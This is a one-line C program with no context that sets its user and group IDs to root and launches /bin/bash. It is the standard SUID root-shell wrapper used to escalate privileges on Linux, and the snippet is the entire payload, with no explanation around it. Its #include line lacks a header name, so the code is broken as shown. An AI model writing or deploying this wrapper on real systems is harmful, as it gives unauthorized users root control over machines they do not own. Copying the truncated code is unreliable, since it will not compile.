#include int main() { setuid(0); setgid(0); execl("/bin/bash", "bash", NULL); return 0; }